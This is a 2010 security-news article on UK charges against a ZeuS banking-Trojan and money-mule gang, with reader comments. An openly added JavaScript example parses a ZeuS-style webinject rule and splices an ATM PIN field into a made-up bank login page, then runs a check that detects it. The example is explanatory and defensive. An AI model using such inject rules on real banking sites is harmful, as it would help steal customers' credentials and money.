Krebs on Security

In-depth security news and investigation

11 Charged In ZeuS & Money Mule Ring

Authorities in the United Kingdom on Wednesday charged 11 individuals with running an international cybercrime syndicate that laundered millions of dollars stolen from consumers and businesses with the help of the ultra-sophisticated ZeuS banking Trojan.

The gang is believed to be responsible for stealing more than $30 million from banks worldwide between October 2009 and September 28, 2010, and roughly £6 million (US$9.5 million) from financial institutions in the United Kingdom over a three-month period.

Karina Kostromina, in undated photo.

According to sources close to the case, members of the group also were heavily involved in online banking thefts perpetrated against dozens of small businesses and organizations based in the United States. Eight gang members were charged with money laundering, and 10 were charged with conspiracy to defraud. Police arrested 20 people in a pre-dawn raid on Tuesday; nine were bailed on Wednesday. The Metropolitan Police’s Central e-Crime Unit said those individuals may face charges at a later date. Those charged were due to appear in Westminster Magistrates’ Court early this morning.

The individuals arrested in the U.K. are thought to be a subset of a global cybercrime operation. The Wall Street Journal now reports that the U.S. Attorney’s office in Manhattan is preparing to announce that 60 people have been charged in connection with a major ZeuS crime ring.

Sources say the ringleader of the U.K. gang, 32-year-old Ukrainian property developer Yevhen Kulibaba (pictured above right), shuttled some of the stolen funds from the U.K. to Ukraine and to Latvia, where he has been building a home with his wife. Information obtained by KrebsOnSecurity indicates that Kulibaba’s wife may be Karina Kostromina (pictured above left), a 33-year-old Latvian woman who was among those charged with money laundering and conspiracy in connection with this case. The U.K. Metropolitan Police declined to confirm or deny whether Kulibaba and Kostromina were married, although their public statement puts the two in the same neighborhood – Nevada Heights, Chingford, Essex.

Yuriy Konovalenko

Kulibaba’s right-hand man, 28-year-old Yuriy Konovalenko — also of Nevada Heights — is described by the e-Crime Unit as a self-employed Web designer from Ukraine. Sources say Konovalenko was chiefly responsible for managing a large number of “money mules,” people hired to withdraw, carry or transmit cash stolen by the gang. A review of Konovalenko’s social networking site identities suggests he is a blood relative of Kulibaba’s, but U.K. police declined to confirm or deny this information.

Also charged with conspiracy and stealing money from online bank accounts is Milka Valerij (pictured below), a 29-year-old Ukrainian whom U.K. police say was a building laborer.

Milka Valerij

The oldest alleged member of the group — 34-year-old Georgian Zurab Revazishvili — is facing charges under the U.K. Identity Cards Act 2006, which makes it a crime to possess false identity documents. The Metropolitan Police statement on the crimes doesn’t specify what Revazishvili’s role was, but sources say he may have been responsible for creating false identity documents for the gang’s money mules.

ZeuS is a commercial crimeware kit sold for a few thousand dollars per copy in underground online forums. It is designed primarily to steal sensitive financial data stored on victim computers or transmitted through victim Web browsers. Its most advanced features allow criminals to inject content into a bank’s Web page as it is displayed in the victim’s browser in real time (a so-called man-in-the-browser attack, which defeats the padlock icon and SSL because the tampering happens after decryption), take screen shots from infected PCs, and quietly redirect victims from banking Web sites to counterfeit versions set up by the attackers. Stolen data is sent to a “drop server” controlled by the attacker, and the kit lets miscreants control the infected systems remotely. Check out this link for a more comprehensive discussion of the features built into ZeuS.
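The page-injection feature described above is driven by a plain-text rule file in the ZeuS kit (the “webinjects” format, with set_url, data_before, data_inject, data_after and data_end markers). As an added example that is not part of the original article or of the ZeuS code, the script below parses a constructed rule in that layout, applies it to a constructed bank login page the way the Trojan would on its way to the browser, and then runs the simple page-integrity check a bank’s own script could use to spot the extra field. The URL bank.example.test, the HTML, the rule and the field names are all assumptions made for the example; the parser covers only that subset of the format.

```javascript
// Added example (not from the original article or from ZeuS itself): a ZeuS-style
// "webinject" rule rewriting a bank page, plus a page-integrity check that flags
// the injected field. URL, HTML and rule are constructed for illustration; the
// parser handles only set_url / data_before / data_inject / data_after / data_end.

// Constructed inject rule in the webinjects.txt layout. '*' is a wildcard in both
// the URL mask and the anchors; flags such as GP select the HTTP methods the rule
// applies to and are parsed but ignored here.
const WEBINJECT_CONFIG = `
set_url https://bank.example.test/login* GP
data_before
name="password"*>
data_end
data_inject
<label>Card PIN</label><input type="text" name="atm_pin">
data_end
data_after
data_end
`;

// Constructed login page exactly as the bank would serve it.
const LOGIN_PAGE = [
  '<form method="post" action="/login">',
  '  <input type="text" name="username">',
  '  <input type="password" name="password" autocomplete="off">',
  '  <button type="submit">Sign in</button>',
  '</form>',
].join('\n');

// Turn a '*'-wildcard mask into regex source; every other character is literal.
function maskToRegexSource(mask) {
  return mask.replace(/[.+?^${}()|[\]\\]/g, '\\$&').replace(/\*/g, '[\\s\\S]*?');
}

function urlMatches(mask, url) {
  return new RegExp('^' + maskToRegexSource(mask) + '$').test(url);
}

// Parse the config into rules: { mask, flags, injects: [{ before, inject, after }] }.
function parseWebinjects(text) {
  const rules = [];
  let rule = null;    // rule opened by the most recent set_url line
  let triple = null;  // before/inject/after group currently being filled
  let block = null;   // which block of the triple we are inside, or null
  let buf = [];
  for (const raw of text.split('\n')) {
    const line = raw.replace(/\r$/, '');
    if (block !== null) {
      if (line.trim() === 'data_end') {
        triple[block] = buf.join('\n');
        block = null;
      } else {
        buf.push(line);
      }
      continue;
    }
    const t = line.trim();
    if (t.startsWith('set_url ')) {
      const [, mask, flags = ''] = t.split(/\s+/);
      rule = { mask, flags, injects: [] };
      rules.push(rule);
    } else if (t === 'data_before' && rule !== null) {
      triple = { before: '', inject: '', after: '' };
      rule.injects.push(triple);
      block = 'before';
      buf = [];
    } else if ((t === 'data_inject' || t === 'data_after') && triple !== null) {
      block = t.slice('data_'.length);
      buf = [];
    }
  }
  return rules;
}

// Apply every rule whose mask matches the URL. The injected markup replaces
// whatever lies between the data_before anchor and the data_after anchor; an
// empty data_after means plain insertion right after data_before.
function applyWebinjects(rules, url, html) {
  let out = html;
  for (const rule of rules) {
    if (!urlMatches(rule.mask, url)) continue;
    for (const { before, inject, after } of rule.injects) {
      let start = 0;
      if (before) {
        const m = new RegExp(maskToRegexSource(before)).exec(out);
        if (m === null) continue; // anchor absent: the rule does not fire
        start = m.index + m[0].length;
      }
      let end = start;
      if (after) {
        const m = new RegExp(maskToRegexSource(after)).exec(out.slice(start));
        if (m === null) continue;
        end = start + m.index;
      }
      out = out.slice(0, start) + inject + out.slice(end);
    }
  }
  return out;
}

// Defender side: list <input> names that are not in the set the server emitted.
function unexpectedFields(html, expectedNames) {
  const expected = new Set(expectedNames);
  const re = /<input\b[^>]*?\bname="([^"]*)"/gi;
  const extra = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    if (!expected.has(m[1])) extra.push(m[1]);
  }
  return extra;
}

function demo() {
  const rules = parseWebinjects(WEBINJECT_CONFIG);
  const injected = applyWebinjects(rules, 'https://bank.example.test/login', LOGIN_PAGE);
  return { injected, flagged: unexpectedFields(injected, ['username', 'password']) };
}

console.log(JSON.stringify(demo(), null, 2));
```

Run it with node and the output shows the “Card PIN” field spliced in directly after the password input and `flagged` reporting `atm_pin`. The caveat a practitioner should keep in mind: the check only works because the bank knows which fields it served, and a Trojan that already runs inside the browser can in principle strip or fake the check itself, so it is a detection signal rather than a guarantee; out-of-band confirmation of transactions remains the defense that the inject cannot reach.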

Currently, there are at least 160 unique ZeuS control networks online worldwide, according to ZeuS Tracker, a site that keeps tabs on the number and geographic distribution of unique ZeuS botnets.

Andy Fried, owner of Deteque, a computer security consultancy in Alexandria, Va., has been tracking ZeuS related activity and spam for many months. Fried said that while rounding up those who are buying and deploying ZeuS botnets is important, going after the money mule infrastructure is the best way to ensure that the stolen data can’t be used.

“These ZeuS operations are a pipeline, and the money mules are a very important part of that,” Fried said. “[Online banking] credentials have intrinsic value, but it’s not until you’re able to utilize that information — and that’s where the money mules come in — that those credentials have real value. That’s why choking off the money mule network will probably have the best short-term detrimental effect against ZeuS.”

This entry was posted on Thursday, September 30th, 2010 at 11:13 am and is filed under A Little Sunshine, Target: Small Businesses.

Brian, thank you once again for a very interesting article! I find it astonishing that this gang was supposedly operating from the UK – the Ukraine should currently be more of a safe haven for them. Unless they are only the part of the organization that the prosecutors could get.

Btw, I think you got the name wrong for one of the guys – I am pretty sure that Valerij is his first name (yes, it appears the same in other articles as well so maybe the police published it like that).

Thanks, Wladimir. I think you’re right about Valerij’s name: There are multiple misspellings of peoples’ names in the UK press release about this. I corrected one of them in my story, which you will see names Yuriy KoNovalenko, while the UK press release says KoRovalenko.

Also, I am not sure, but I believe Kulibaba’s first name is actually Yevgheniy.

I found a few other posts regarding the arrest of the 19, the 11 charged and the 60 being charged by the US on a blog by Graham Cluley (Sophos). He said that according to the media reports the charges by the US Attorney are related to the arrests in London. If he’s right, and those in the US are mostly the money mules, then it looks like we’re taking Fried’s advice and actually going after both sides of the issue instead of just one.

What I found is at the link below – it merges in with all his other posts so sometimes you have to scroll through to find the related ones. http://www.sophos.com/blogs/gc/

I think this is great news! Finally action is being taken and it’s not just one or two people… If there is more action taken against this kind of behavior then I think people will think twice before doing it. Will it stop it completely? No – but it can still make a big difference if we continue to fight back. Perhaps those hired as mules will think about it and be more cautious before getting pulled into the scam… that would definitely make it more difficult for the people behind it. Plus, they’d have to worry more about being caught too. Will be interesting to see how things play out.

Hallelujah! Great news to hear some cyber thieves are getting caught. As usual, another excellent job of reporting cyber crime. You’ve done an outstanding job in raising awareness on the cyber crime issue and the damaging effects of the Zeus toolkit. I see your name in several articles and white papers on Trojans and man-in-the-middle attacks. You’re famous!

It would seem odd that someone whose business is web design would have no domains registered in his own name, but DomainTools is coming up with zero for all combinations of Yuri/Yuriy/Yurij and Konovalenko/Korovalenko. Could his name be Kovalenko?

It just seems that even someone with so much involvement in illegal activity would have some personal domain name registrations, too. But perhaps with less internet penetrance in Eastern Europe, there would have been less likelihood of a friend or relative asking him to set up a legitimate site for their family or business.